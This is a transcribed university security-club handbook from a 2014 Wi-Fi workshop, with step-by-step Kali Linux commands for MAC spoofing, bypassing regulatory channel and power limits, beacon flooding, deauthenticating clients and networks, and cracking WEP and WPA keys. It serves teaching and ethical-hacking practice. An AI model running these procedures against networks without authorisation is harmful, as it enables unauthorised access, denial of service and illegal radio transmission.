Missouri University of Science and Technology ACM SIG-Security 2014 Wi-Fi Workshop Exploitation Handbook

Size: px
Start display at page:

Download "Missouri University of Science and Technology ACM SIG-Security 2014 Wi-Fi Workshop Exploitation Handbook"

Transcription

1 Missouri University of Science and Technology ACM SIG-Security 2014 Wi-Fi Workshop Exploitation Handbook 1

2 2

3 The information provided in this manual is to be used for educational purposes only. The authors are in no way responsible for any misuse of the information provided. All of the information in this manual is meant to help the reader develop a Wi-Fi hacker defense attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Any hacking discussed in this manual should be regarded as Ethical hacking. You implement the information given at your own risk. By reading these tutorials given in this manual, you agree that this tutorial is intended for educational purposes only and the author cannot be held liable for any kind of damages done whatsoever to your machine, or damages caused by some other, creative application of this tutorial. In any case you disagree with the above statement, stop here. *Note-All images, programs, and steps in this manual were tested and performed with 32-bit Kali Linux version live iso downloaded from installed to a USB flash drive with YUMI-Multiboot USB Creator available from and an Alfa AWUSO36H USB wireless adapter on a laptop computer with an internal wireless card and an internal Ethernet card. Any statement starting with a # character is meant to be run in the terminal. Each section of this manual is starting as if you just freshly booted into Kali. You may not need to do the first steps in a section if you have already done work since booting your computer. Two examples of this would be opening the terminal and starting monitor mode on wlan1 so that you now have a mon0 interface. When text appears in quotes that means not to type it verbatim, but rather substitute something for the text in the quotes. For Example password means to type what you want the password to be. 3

4 4

5 Table of Contents Terms and Definitions.. 7 Getting to know Kali Linux 9 Initial Computer Setup.10 Tools Used in this manual..11 Finding the correct Wireless adapter. 13 Finding your MAC address...14 Specifically changing your MAC address..15 Randomly changing your MAC address 17 Changing your MAC address back the factory address.19 Changing the channel of your wireless card. 20 Operating Wi-Fi outside US regulation frequencies...21 Operating your wireless card with more power Finding the modes your wireless card supports.25 Operating your card in ad-hoc mode. 26 Operating your card in monitor mode..28 Data gathering in monitor mode..29 Beacon Flooding 31 Viewing Probe Requests..33 Passive Network Scan 35 Active Network Scan..37 5

6 Directed Client Deauthentication 38 Directed Network Deauthentication.. 40 Multiple Network Deauthentication..42 Forced connection to a specific access point 44 Breaking WEP Encryption 46 Breaking WPA Encryption with a dictionary list.50 Breaking WPA Encryption with a rainbow table.54 Computing personalized Rainbow Tables 58 Breaking WPA Encryption by brute force 60 Charts and Figures 64 6

7 Terms and Definitions Access Point(AP)- a device that allows wireless devices to connect to a wired network using Wi-Fi Bandwidth-The difference between the upper and lower frequencies in a continuous set of frequencies. Channel-A pre-defined number assigned to a specific center frequency and bandwidth within the frequency range that Wi-Fi operates within. Within the US, channels 1-11 are available for use at higher powers. Evil Twin- A rogue Wi-Fi access point that appears to be a legitimate one offered on the premises, but actually has been set up to eavesdrop on wireless communications. Frequency- A rate of oscillation which corresponds to radio waves and the alternating currents which carry radio signals. Honeypot-A wireless access point intentionally set up to allow people to connect to it for reasons of monitoring traffic or other malicious reasons. IEEE A set of media access control and physical layer specifications for implementing wireless local area network computer communication in the 2.4GHz, 3.6GHz, 5GHz, 60 GHz, and tv white space frequency bands. IP Address- A numerical label assigned to each device participating in a computer network that uses the Internet Protocol for communication. ISM Band- Radio bands reserved internationally for the use of radio frequency energy for industrial, scientific and medical purposes other than telecommunications. Despite the intent of the original allocations, and because there are multiple allocations, in recent years the fastest-growing uses of these bands have been for short-range, low power communications systems. MAC Address- A unique identifier assigned to network interfaces for communications on the physical network segment. Modes-Different ways that the wireless card can function. These modes include master, managed, ad-hoc, mesh, repeater, and monitor. Master mode is used by wireless access points. Managed mode is used by clients to 7

8 connect to a wireless network. Ad-hoc is used for creating a network directly between clients. Mesh mode is used in commercial applications to create ad-hoc networks between access points. Repeater mode is used to boost the range of a wireless access point. Monitor mode is used when wishing to view traffic that was not meant for your computer. NIC-Short for network interface card. A computer hardware component that connects a computer to a computer network. Packet- A formatted unit of data carried by a packet-switched network. A packet consists of two kinds of data: control information and user data (also known as payload). The control information provides data the network needs to deliver the user data, for example: source and destination network addresses, error detection codes, and sequencing information. Typically, control information is found in packet headers and trailers, with payload data in between. Rainbow Table- A pre-computed table for reversing cryptographic hash functions, usually for cracking password hashes. Tables are usually used in recovering a plaintext password up to a certain length consisting of a limited set of characters. WEP- Wired Equivalent Privacy. An easily broken security algorithm for IEEE wireless networks introduced in Wi-Fi-The trademarked name from the Wi-Fi Alliance for a popular technology that allows the wireless transfer of data based upon the IEEE standard. WPA- Wi-Fi Protected Access. A security protocol and security certification program developed by the Wi-Fi alliance to secure wireless networks. WPA was designed to take the place of WEP. WPA2- Wi-Fi Protected Access II. A security protocol and security certification program developed by the Wi-Fi alliance to secure wireless networks. WPA2 was designed to take the place of WPA. 8

9 Getting to know Kali Linux Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. Mati Aharoni and Devon Kearns of Offensive Security developed it by rewriting BackTrack, their previous forensics Linux distribution. In addition to Kali Linux, Offensive Security also maintains the Exploit Database and the free online course, Metasploit Unleashed. Kali Linux is preinstalled with numerous penetration-testing programs, including nmap (a port scanner), Wireshark (a packet analyzer), John the Ripper (a password cracker), and Aircrack-ng (a software suite for penetration-testing wireless LANs). Users may run Kali Linux from a hard disk, live CD, or live USB. It is a supported platform of the Metasploit Project s Metasploit Framework, a tool for developing and executing security exploits. Kali Linux is distributed in 32- and 64-bit images for use on hosts based on the x86 instruction set, as well as an image for the ARM architecture for use on the Raspberry Pi computer and on Samsung s ARM Chromebook. 9

10 Initial Computer Setup 1. With the computer off plug in the USB flash drive with kali linux installed as well as the USB alfa wireless card. 2. Turn on the computer and boot off of the USB. The will vary upon computer manufacturer, but there will a button to press before your computer boots off of the internal hard drive. 3. You should be brought to the YUMI multiboot USB start page. Using the arrow keys select System Tools -> and hit enter. 4. You should be brought into the Systems Tools page of YUMI. Using the arrow keys select kali-linux i386 and hit enter. 5. You should be brought to the Kali Linux Boot menu. Using the arrow keys select Live (686-pae) and hit enter. Your computer is now booting off of the USB drive in a live mode. This means that nothing is being written to the hard drive and in fact you could do this without a hard drive even installed. 6. You should now be booted into kali linux and sitting at the desktop. It is to be noted that by default, kali runs in a single user environment meaning that you are the root(admin). If kali is left alone for a set amount of time it will lock the screen and the password for the root account is toor. 7. In order to enable the wireless cards, you must turn off airplane mode which is enabled by default. Click Applications Systems Tools Preferences System Settings. From the System settings select Network and then click on the Airplane Mode toggle switch to make sure it is off. 8. Your computer is now ready to proceed through this manual. 10

11 Tools used in this manual aircrack-ng o o A network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for wireless networks aireplay-ng o o Used to inject frames and generate traffic for later use in aircrack-ng for cracking WEP and WPA-PSK keys. airmon-ng o o This script can be used to enable monitor mode on wireless interfaces. It may also be used to go back from monitor mode to managed mode. airodump-ng o o Is used for packet capturing of raw frames and is particularly suitable for collecting WEP Ivs (Initialization Vector) for the intent of using them with aircrack-ng. Jasager-karma o o KARMA enabled access points passively listen to any client wireless requests and then responds to it with the SSID that the client probed for and thus impersonating virtually any Access Point. Kali Linux o o A Debian-derived Linux distribution designed for digital forensics and penetration testing. mdk3 o 11

12 o A program that uses the osdep injection library from the aircrack-ng project. Used for packet injection as well as numerous other Wi-Fi related attacks such as a wireless DDOS(directed denial of service) attack. tshark o o An open-source packet analyzer used for network troubleshooting, analysis, software and communication protocol development, and education. 12

13 1. Open the terminal Finding the correct wireless adapter 2. type #airmon-ng and hit enter 3. The interface with the realtek RTL8187L is the interface that you want to use. In this case that interface is wlan1 because there is already an internal wireless card which is wlan0. Your situation may be different and substitute the correct interface on your own computer when wlan1 is used in this manual. 13

14 Finding your MAC address 1. Open the terminal 2. Type #ifconfig wlan1 14

15 Specifically changing your MAC address 1. Open the terminal 2. Type #ifconfig wlan1 down 3. Type one of the following #ifconfig wlan1 hw ether de:ad:be:ef:c0:fe #macchanger m de:ad:be:ef:c0:fe wlan1 15

16 4. Type # ifconfig wlan1 up 5. Type #ifconfig wlan1 ****Notice that the MAC address is now different than if you were to run this command when the computer if first booted. 16

17 Randomly Changing your MAC Address 1. Open the terminal 2. Type #ifconfig wlan1 down 3. Type one of the following #ifconfig wlan1 hw ether 96:de:3a:c5:3a:74 #macchanger r wlan1 Specific Random Computer Random 17

18 4. Type #ifconfig wlan1 up 5. Type #ifconfig wlan1 ****Notice that the MAC address is now different than if you were to run this command when the computer if first booted. 18

19 Changing your MAC address back to factory original 1. Open the terminal 2. Type #ifconfig wlan1 down 3. Type #macchanger p wlan1 4. Type #ifconfig wlan1 up 5. Type #ifconfig wlan1 19

20 Changing the Channel of your wireless card 1. Open the terminal 2. Type #iwconfig wlan1 3. Type #iwconfig wlan1 channel c c is the channel you wish to set 4. Type #iwconfig wlan1 ****Notice that a Frequency section has been added and will change depending upon what channel you entered. 20

21 Operating Wi-Fi outside US regulation frequencies 1. Open the terminal 2. Type #iw reg get 3. Type #iw reg set JP 4. Type #iw reg get 21

22 5. Type #iwconfig wlan1 channel c c is the channel you wish to use Type #iwconfig wlan1 ****Notice that the frequency corresponds to channel 14 which is normally not available for use in the United States and is only used in Japan. This holds true for channel 12 and 13 which are not used with higher power in the US. 22

23 Operating your wireless card with more power 1. Open the terminal 2. Type #iwconfig wlan1 3. Type #iw reg set BO 4. Type #iwconfig wlan1 txpower 30 23

24 5. Type #iwconfig wlan1 ****Notice that the Tx-Power has changed from 20 dbm to 30dBm. This is a change from.1 Watt to 1 Watt. The FCC regulation on ERP(Effective Radiated Power) depends on the use of the wireless link. A point to point wireless connection can have a greater ERP than a point to multipoint wireless link. 24

25 Finding the modes your wireless card supports 1. Open the terminal 2. Type #airmon-ng 3. Type #iw phy phy0 info grep A3 modes Notice that phy0 is the Realtek RTL8187L, this may vary on your computer. 25

26 Operating your wireless card in ad-hoc mode Step 6 is optional as it enables WEP security. 1. Open the terminal 2. Type #ifconfig wlan1 down 3. Type #iwconfig wlan1 mode ad-hoc 4. Type #iwconfig wlan1 channel 1 5. Type #iwconfig wlan1 essid nameofnetwork 26

27 6. Type #iwconfig wlan1 key s: password note that the password must work out to be 10 or 26 hexadecimal numbers. This is equivalent to 5 or 13 characters. 7. Type #ifconfig wlan1 up 8. Type #iwconfig wlan1 27

28 Operating your card in monitor mode 1. Open the terminal 2. Type #airmon-ng start wlan1 3. Type #iwconfig ****Notice that a new Interface has been created, mon0. 28

29 1. Open the terminal Data gathering in monitor mode 2. Type #airmon-ng start wlan1 3. Type #tshark i mon0 29

30 You should see something similar to this This is every packet being sent across the given channel 4. Type ctrl-c to end 5. Type #airodump-ng mon0 You should see something similar to this The top section shows access points while the bottom shows client computers. 6. Type ctrl-c to end 30

31 Beacon Flooding Beacons are a type of (Wi-Fi) management frames. They are transmitted periodically by an access point to announce its presence and contain all of the information about a network (name, speeds, encryption type, etc). We are able to send these packets even though a network does not exist. 1. Open the terminal 2. Type #airmon-ng start wlan1 3. Type #nano ssidlist 31

32 4. Add different network names on new lines 5. Hit ctrl-x then y then enter when done entering network names 6. Type #mdk3 mon0 b -f ssidlist 7. Hit ctrl-c to quit when done sending beacons ****You can view these networks on a computer, but you cannot connect to them since they are not real. 32

33 1. Open the terminal Viewing Probe Requests 2. Type #airmon-ng start wlan1 33

34 3. Type #airodump-ng mon0 4. Type ctrl-c to stop ****Notice that this section of output is at the very bottom of the screen. If many access points are within range, you might have to zoom out while the program is running and then zoom back in after stopping it. The text zoom option is available from the view menu at the top of the screen. 34

35 Passive Network Scan 1. Open the terminal 2. Type #airmon-ng start wlan1 35

36 36 3. Type #iw dev wlan1 scan passive grep SSID

37 1. Open the terminal Active Network Scan 2. Type #airmon-ng start wlan1 3. Type #iwlist wlan1 scan grep ESSID 37

38 1. Open the terminal Directed Client Deauthentication 2. Type #airmon-ng start wlan1 38

39 3. Type #airodump-ng mon0 This is when a target is chosen The BSSID is the AP MAC and the STATION is the client MAC The ESSID is the network name and the number under CH is the channel. 4. Type ctrl-c to quit 5. Type #iwconfig mon0 channel is the channel of the AP from above 6. Type #aireplay-ng ignore-negative-one a AP MAC -c Client MAC mon0 39

40 1. Open the terminal Directed Network Deauthentication 2. Type #airmon-ng start wlan1 3. Type #airodump-ng mon0 Choose your target network 4. Type ctrl-c when finished 40

41 5. Type #nano blacklist put the target network s MAC address on separate lines 6. Type crtl-x, Y, enter 7. Type #mdk3 mon0 d -b blacklist -c is the channel of the access point 8. Type ctrl-c to stop 41

42 1. Open the terminal Multiple Network Deauthentication 2. Type #airmon-ng start wlan1 3. Type #airodump-ng mon0 choose your target networks 4. Type crtl-c when finished 42

43 5. Type #nano blacklist Put the target networks MAC addresses on separate lines 6. Type ctrl-x, Y, enter 7. Type #mdk3 mon0 d -b blacklist -c 6,11 6 and 11 are the channels of access points 8. Type ctrl-c to stop 43

44 Forced connection to a specific access point 1. Open the terminal 2. Type #airmon-ng start wlan1 3. Type #airodump-ng mon0 This is the AP that will be accessible 4. Type ctrl-c when finished finding the AP info 44

45 5. Type #nano whitelist 6. Type ctrl-x, Y, enter when finished 7. Type #mdk3 mon0 d w whitelist 8. Type ctrl-c to stop 45

46 1. Open the terminal Breaking WEP Encryption 2. Type #airmon-ng start wlan1 3. Type #airodump-ng mon0 4. Type ctrl-c when a network has been found 46

47 5. Type #airodump-ng c 6 w acm_wep --bssid 12:18:0A:21:AE:E4 mon0 6. Open a new tab in terminal(file new tab) 7. Type #aireplay-ng --ignore-negative-one -1 0 a 12:18:0A:21:AE:E4 h 00:C0:CA:75:6F:AB mon0 8. Type #aireplay-ng --ignore-negative-one -3 b 12:18:0A:21:AE:E4 h 00:C0:CA:75:6F:AB mon0 47

48 9. Go back to the first tab and wait until the number in the #Data column reaches Note that this is not a set number due to the statistical analysis that goes into breaking the key and can vary greatly depending upon the length of the key and several other factors. In this case it worked with ~ Open a new tab in terminal(file new tab) 11. Type #aircrack-ng b 12:18:0A:21:AE:E4 acm_wep-01.cap 12. If not successful try again after the #Data column reaches the suggested number 48

49 13. When successful you will see the a message similar to below 14. Go to each of the other tabs and type ctrl-c to stop the running program. 49

50 Breaking WPA Encryption with a dictionary list 1. Open the terminal 2. Type #airmon-ng start wlan1 3. Kill the two processes that could cause trouble with the command #kill pid pid is the PID from the airmon-ng program output above 50

51 4. Type #airodump-ng mon0 5. Type ctrl-c when finished finding the target 6. Type #airodump-ng -c 11--bssid 00:1A:C4:51:3C:31 --w acm_dictionary mon0 7. Open a new tab in terminal(file new tab) 51

52 8. Type #iwconfig mon0 channel Type #aireplay-ng --ignore-negative-one a AP MAC -c client mac mon0 10. Go back to the first tab and wait until WPA handshake : appears in the upper right. Then type ctrl-c to stop the collection of data This handshake is necessary to perform the password crack 11. Make sure your dictionary file in the same directory as your.cap file 52

53 12. Type #aircrack-ng acm_dictionary-01.cap w english.txt 53

54 Breaking WPA Encryption with a Rainbow Table 1. Open the terminal 2. Type #airmon-ng start wlan1 3. Kill the two processes that could cause trouble with the command #kill pid pid is the PID from the airmon-ng program output above 54

55 4. Type #airodump-ng mon0 5. Type ctrl-c when finished finding the target 6. Type #airodump-ng -c 11--bssid 00:1A:C4:51:3C:31 --w acm_dictionary mon0 7. Open a new tab in terminal(file new tab) 55

56 8. Type #iwconfig mon0 channel Type #aireplay-ng --ignore-negative-one a AP MAC -c client mac mon0 10. Go back to the first tab and wait until WPA handshake : appears in the upper right. Then type ctrl-c to stop the collection of data This handshake is necessary to perform the password crack 11. Make sure your rainbow table file in the same directory as your.cap file 56

57 12. Type #cowpatty -r acm_dictionary-01.cap d acm_dictionary_hash s acm_dictionary 57

58 1. Open the terminal Computing personalized Rainbow Tables 2. Type #airmon-ng start wlan1 3. Type #airodump-ng mon0 58

59 4. Type ctrl-c when finished finding the target 5. Make sure your dictionary file is in your current file directory 6. Type #genpmk -f English.txt -d acm_dictionary_hash -s acm_dictionary 7. When the program finishes running the rainbow table will be saved in the current directory 59

60 1. Open the terminal Breaking WPA Encryption by brute force 2. Type #airmon-ng start wlan1 3. Kill the two processes that could cause trouble with the command #kill pid pid is the PID from the airmon-ng program output above 60

61 4. Type #airodump-ng mon0 5. Type ctrl-c when finished finding the target 6. Type #airodump-ng -c 11--bssid 00:1A:C4:51:3C:31 --w acm_dictionary mon0 7. Open a new tab in terminal(file new tab) 61

62 8. Type #iwconfig mon0 channel Type #aireplay-ng --ignore-negative-one a AP MAC -c client mac mon0 10. Go back to the first tab and wait until WPA handshake : appears in the upper right. Then type ctrl-c to stop the collection of data This handshake is necessary to perform the password crack 62

63 Type #john -stdout -incremental:all aircrack-ng -b 00:1a:c4:51:3c:31 -w acm_dictionary-01.cap 11. Now you wait until the program has cracked the password. The given method will eventually break every password but would take an extremely long time. There are optimizations that could be made, for example if the length of the key was known. In making this manual, I did not wait until completion because of time constraints. 63

64 Charts and Figures Wi-Fi channels in the 2.4Ghz band and 5Ghz Band Standards 64

Wireless Security. Comp Sci 3600 Security. Attacks WEP WPA/WPA2. Authentication Encryption Vulnerabilities

Wireless Security. Comp Sci 3600 Security. Attacks WEP WPA/WPA2. Authentication Encryption Vulnerabilities Wireless Security Comp Sci 3600 Security Outline 1 2 3 Wired versus wireless Endpoint Access point Figure 24.1 Wireless Networking Components Locations and types of attack Outline 1 2 3 Wired Equivalent

More information

Hacking Encrypted Wireless Network

Hacking Encrypted Wireless Network Hacking Encrypted Wireless Network Written by Fredrik Alm CompuTechSweden 2010 http://www.fredrik-alm.se/ REQUIREMENTS Software: Operating System: Linux kernel (Recommended: BackTrack 4 Final ) Download:

More information

Section 4 Cracking Encryption and Authentication

Section 4 Cracking Encryption and Authentication Section 4 Cracking 802.11 Encryption and Authentication In the previous section we showed the vulnerabilities of Open Wireless LANs. In this section we ll show some of the techniques and tools used to

More information

Using aircrack and a dictionary to crack a WPA data capture

Using aircrack and a dictionary to crack a WPA data capture Step by Step Backtrack 5 and wireless Hacking basics Installing Backtrack 5 Creating a Backtrack 5 R3 Live CD Installing to the Hard drive Installing and running with VMware Reaver WPA dictionary attack

More information

ETHICAL HACKING OF WIRELESS NETWORKS IN KALI LINUX ENVIRONMENT

ETHICAL HACKING OF WIRELESS NETWORKS IN KALI LINUX ENVIRONMENT 1. P. ČISAR, 2. S. MARAVIĆ ČISAR ETHICAL HACKING OF WIRELESS NETWORKS IN KALI LINUX ENVIRONMENT 1. Academy of Criminalistic and Police Studies, 11080 Belgrade - Zemun, Cara Dusana 196, SERBIA 2. Subotica

More information

SETTING UP THE LAB 1 UNDERSTANDING BASICS OF WI-FI NETWORKS 26

SETTING UP THE LAB 1 UNDERSTANDING BASICS OF WI-FI NETWORKS 26 Table of Contents 0 SETTING UP THE LAB 1 HARDWARE REQUIREMENTS 1 SOFTWARE REQUIREMENTS 2 KALI LINUX INSTALLATION: 3 INSTALL KALI LINUX UNDER VMWARE 3 INSTALLING KALI LINUX ON PC 11 Kali Linux on USB: Advantages

More information

Wireless Network Security

Wireless Network Security Wireless Network Security Why wireless? Wifi, which is short for wireless fi something, allows your computer to connect to the Internet using magic. -Motel 6 commercial 2 but it comes at a price Wireless

More information

Wireless Attacks and Countermeasures

Wireless Attacks and Countermeasures Wireless Attacks and Countermeasures Wireless Network Technology Wireless network refers to any type of computer network which is wireless, and is commonly associated with a network whose interconnections

More information

Today s challenge on Wireless Networking. David Leung, CISM Solution Consultant, Security Datacraft China/Hong Kong Ltd.

Today s challenge on Wireless Networking. David Leung, CISM Solution Consultant, Security Datacraft China/Hong Kong Ltd. Today s challenge on Wireless Networking David Leung, CISM Solution Consultant, Security Datacraft China/Hong Kong Ltd. Agenda How Popular is Wireless Network? Threats Associated with Wireless Networking

More information

2013 Summer Camp: Wireless LAN Security Exercises JMU Cyber Defense Boot Camp

2013 Summer Camp: Wireless LAN Security Exercises JMU Cyber Defense Boot Camp 2013 Summer Camp: Wireless LAN Security Exercises 2013 JMU Cyber Defense Boot Camp Questions Have you used a wireless local area network before? At home? At work? Have you configured a wireless AP before?

More information

This repository. Insights. Projects 0. Join GitHub today

This repository. Insights. Projects 0. Join GitHub today Features Business Explore Marketplace Pricing brannondorsey / wifi-cracking Code Issues 0 Pull requests 1 Sign in or Sign up This repository Watch Projects 0 73 Star 2,627 Fork 183 Insights Dismiss Join

More information

INTERNATIONAL JOURNAL OF PURE AND APPLIED RESEARCH IN ENGINEERING AND TECHNOLOGY

INTERNATIONAL JOURNAL OF PURE AND APPLIED RESEARCH IN ENGINEERING AND TECHNOLOGY INTERNATIONAL JOURNAL OF PURE AND APPLIED RESEARCH IN ENGINEERING AND TECHNOLOGY A PATH FOR HORIZING YOUR INNOVATIVE WORK ANALYSIS OF PENETRATION TESTING AND COUNTERMEASURES FOR SECURING WIRELESS NETWORK

More information

5 Steps Wifi Hacking Cracking WPA2 Password

5 Steps Wifi Hacking Cracking WPA2 Password Advertise Here Contact Us Request Tutorial Write for Us Download» Hacking Knowledge Hacking News Hacking Tutorial Hacking Widget Online Tools» Tips and Trick Website» Phone Hacking Search 9,517 91 +525

More information

Hacking Wireless Networks by data

Hacking Wireless Networks by data Hacking Wireless Networks by data -disclaimer- The sole purpose of this article is so that you may be informed about how your neighbor may be able to take a laptop, crack your wep/wpa key to your router

More information

Wireless Network Penetration Testing Using Kali Linux on BeagleBone Black

Wireless Network Penetration Testing Using Kali Linux on BeagleBone Black Wireless Network Penetration Testing Using Kali Linux on BeagleBone Black Aparicio Carranza, PhD 1 and Casimer DeCusatis, PhD 2 1 The New York City College of Technology CUNY, USA, acarranza@citytech.cuny.edu

More information

Wireless Security Algorithms

Wireless Security Algorithms (NOTE: If you are using a virtual lab to run your attacks you will need an external Wi Fi attachment. The other option is to have a direct install on your computer. Virtual labs cannot access your wireless

More information

D. The bank s web server is using an X.509 certificate that is not signed by a root CA, causing the user ID and password to be sent unencrypted.

D. The bank s web server is using an X.509 certificate that is not signed by a root CA, causing the user ID and password to be sent unencrypted. Volume: 119 Questions Question No: 1 John Smith uses a coffee shop's Internet hot-spot (no authentication or encryption) to transfer funds between his checking and savings accounts at his bank's website.

More information

Investigations and Incident Response Using BackTrack

Investigations and Incident Response Using BackTrack Investigations and Incident Response Using BackTrack HTCIA New England Chapter General Meeting September 22, 2009 Ming Chow Tufts University mchow@cs.tufts.edu http://www.cs.tufts.edu/~mchow 1 Introduction

More information

Gaining Access to encrypted networks

Gaining Access to encrypted networks Gaining Access to encrypted networks Everything we have learned so far we can do it without having to connect to the target network. We can get more accurate info and launch more effective attacks if we

More information

Wireless Network Security

Wireless Network Security Wireless Network Security By: Jose Rodriguez Table of Contents Wireless Network Security...1 Table of Contents...2 Introduction...3 Wireless Network Requirements...4 Wireless Network Protocols...5 Wireless

More information

Sample Exam Ethical Hacking Foundation

Sample Exam Ethical Hacking Foundation Sample Exam Sample Exam Ethical Hacking Foundation SECO-Institute issues the official Ethical Hacking courseware to accredited training centres where students are trained by accredited instructors. Students

More information

Tutorial: Simple WEP Crack

Tutorial: Simple WEP Crack Tutorial: Simple WEP Crack Version: 1.20 January 11, 2010 By: darkaudax Introduction This tutorial walks you though a very simple case to crack a WEP key. It is intended to build your basic skills and

More information

Is Your Wireless Network Being Hacked?

Is Your Wireless Network Being Hacked? The ITB Journal Volume 9 Issue 1 Article 5 2008 Is Your Wireless Network Being Hacked? Paul King Ivan Smyth Anthony Keane Follow this and additional works at: http://arrow.dit.ie/itbj Part of the Computer

More information

WIRELESS EVIL TWIN ATTACK

WIRELESS EVIL TWIN ATTACK WIRELESS EVIL TWIN ATTACK Prof. Pragati Goel Associate Professor, NCRD s Sterling Institute of Management Studies, Navi Mumbai Mr. Chetan Singh NCRD s Sterling Institute Of Management Studie, Navi Mumbai

More information

Security of WiFi networks MARCIN TUNIA

Security of WiFi networks MARCIN TUNIA Security of WiFi networks MARCIN TUNIA Agenda 1. Wireless standards 2. Hidden network and MAC filtering protection bypassing 3. Encryption independent attacks 4. Attacks on WEP 5. Attacks on WPA/WPA2 6.

More information

CEH Tools. Sniffers. - Wireshark: The most popular packet sniffer with cross platform support.

CEH Tools. Sniffers. - Wireshark: The most popular packet sniffer with cross platform support. Sniffers - Wireshark: The most popular packet sniffer with cross platform support. - Tcpdump: A popular CLI sniffer available for both the Unix and Linux platforms. - Windump: Windows version of tcpdump.

More information

Obstacle Avoiding Wireless Surveillance Bot

Obstacle Avoiding Wireless Surveillance Bot Volume 118 No. 20 2018, 4309-4314 ISSN: 1314-3395 (on-line version) url: http://www.ijpam.eu Obstacle Avoiding Wireless Surveillance Bot ijpam.eu Aman Aryan, Aakanksha Mishra, Raashi Pradeep Shetty Department

More information

Njepat Wireless Hacking Tools V1 User Guide Document Version : 1.0 Tested On Backtrack 5R3 - Gnome Coded By : Xsan-Lahci idea name : 4J4l 13

Njepat Wireless Hacking Tools V1 User Guide Document Version : 1.0 Tested On Backtrack 5R3 - Gnome Coded By : Xsan-Lahci idea name : 4J4l 13 Introduction Njepat Wireless Hacking Tools V1 User Guide Document Version : 1.0 Tested On Backtrack 5R3 - Gnome Coded By : Xsan-Lahci idea name : 4J4l 13 Report Bugs : Website : xsanlahci[at]gmail.com

More information

CyberP3i Hands-on Lab Series

CyberP3i Hands-on Lab Series CyberP3i Hands-on Lab Series Lab Series using NETLAB Designer: Dr. Lixin Wang, Associate Professor Hands-On Lab on Securing Wireless Networks The NDG Security+ Pod Topology Is Used 1. Introduction In this

More information

CYBER ATTACKS EXPLAINED: WIRELESS ATTACKS

CYBER ATTACKS EXPLAINED: WIRELESS ATTACKS CYBER ATTACKS EXPLAINED: WIRELESS ATTACKS Wireless networks are everywhere, from the home to corporate data centres. They make our lives easier by avoiding bulky cables and related problems. But with these

More information

Cyber Security & Ethical Hacking Training. Introduction to Cyber Security Introduction to Cyber Security. Linux Operating System and Networking: LINUX

Cyber Security & Ethical Hacking Training. Introduction to Cyber Security Introduction to Cyber Security. Linux Operating System and Networking: LINUX Cyber Security & Ethical Hacking Training. Introduction to Cyber Security Introduction to Cyber Security HTML PHP Database Linux Operating System and Networking: LINUX NETWORKING Information Gathering:

More information

Ethical Hacking and Prevention

Ethical Hacking and Prevention Ethical Hacking and Prevention This course is mapped to the popular Ethical Hacking and Prevention Certification Exam from US-Council. This course is meant for those professionals who are looking for comprehensive

More information

Wireless Attacks and Defense. By: Dan Schade. April 9, 2006

Wireless Attacks and Defense. By: Dan Schade. April 9, 2006 Wireless Attacks and Defense By: Dan Schade April 9, 2006 Schade - 2 As more and more home and business users adapt wireless technologies because of their ease of use and affordability, these devices are

More information

Chapter 5 Local Area Networks. Computer Concepts 2013

Chapter 5 Local Area Networks. Computer Concepts 2013 Chapter 5 Local Area Networks Computer Concepts 2013 5 Chapter Contents Section A: Network Building Blocks Section B: Wired and Wireless Technologies Section C: Network Setup Section D: Sharing Files Section

More information

Once in BT3, click the tiny black box in the lower left corner to load up a "Konsole" window. Now we must prep your wireless card.

Once in BT3, click the tiny black box in the lower left corner to load up a Konsole window. Now we must prep your wireless card. Hacking WEP wifi passwords 1. Getting the right tools Download Backtrack 3. It can be found here: http://www.remote-exploit.org/backtrack_download.html The Backtrack 4 beta is out but until it is fully

More information

What is a Wireless LAN? The wireless telegraph is not difficult to understand. The ordinary telegraph is like a very long cat. You pull the tail in Ne

What is a Wireless LAN? The wireless telegraph is not difficult to understand. The ordinary telegraph is like a very long cat. You pull the tail in Ne Introduction to Wireless Networking and Security Chino Information Technology Center Steve Siedschlag, Associate Professor What is a Wireless LAN? The wireless telegraph is not difficult to understand.

More information

Wireless technology Principles of Security

Wireless technology Principles of Security Wireless technology Principles of Security 1 Wireless technologies 2 Overview This module provides an introduction to the rapidly evolving technology of wireless LANs (WLANs). WLANs redefine the way the

More information

SharkFest'17 US. Basic workshop of. IEEE packet dissection. Megumi Takeshita

SharkFest'17 US. Basic workshop of. IEEE packet dissection. Megumi Takeshita Basic workshop of SharkFest'17 US IEEE802.11 packet dissection Sample trace and supplemental files are located http://www.ikeriri.ne.jp/download/defcon Megumi Takeshita Packet Otaku ikeriri network service

More information

Worldwide Release. Your world, Secured ND-IM005. Wi-Fi Interception System

Worldwide Release. Your world, Secured ND-IM005. Wi-Fi Interception System Your world, Secured 2016 Worldwide Release System Overview Wi-Fi interception system is developed for police operations and searching of information leaks in the office premises, government agencies and

More information

ISC. 10 October George Wong

ISC. 10 October George Wong ISC 10 October 2014 George Wong Sn vs Al Tin was first replaced by aluminum starting in 1910. In the late 19th century and early 20th century, tin foil was in common use, and some people continue to refer

More information

Advanced Ethical Hacking & Penetration Testing. Ethical Hacking

Advanced Ethical Hacking & Penetration Testing. Ethical Hacking Summer Training Internship Program 2017 (STIP - 2017) is a practical oriented & industrial level training program for all students who have aspiration to work in the core technical industry domain. This

More information

SAGEM Wi-Fi 11g USB ADAPTER Quick Start Guide

SAGEM Wi-Fi 11g USB ADAPTER Quick Start Guide SAGEM Wi-Fi 11g USB ADAPTER Quick Start Guide About this guide This Quick Start Guide describes how to install and operate your SAGEM Wi-Fi 11g USB ADAPTER. Please read this manual before you install the

More information

CSNT 180 Wireless Networking. Chapter 7 WLAN Terminology and Technology

CSNT 180 Wireless Networking. Chapter 7 WLAN Terminology and Technology CSNT 180 Wireless Networking Chapter 7 WLAN Terminology and Technology Norman McEntire norman.mcentire@servin.com Founder, Servin Corporation, http://servin.com Technology Training for Technology Professionals

More information

802.11g PC Card/USB Wireless Adapter

802.11g PC Card/USB Wireless Adapter 802.11g PC Card/USB Wireless Adapter User Guide Regulatory Approvals FCC Statement This equipment has been tested and found to comply with the limits for a Class B digital device, pursuant to Part 15 of

More information

NWD2705. User s Guide. Quick Start Guide. Dual-Band Wireless N450 USB Adapter. Version 1.00 Edition 1, 09/2012

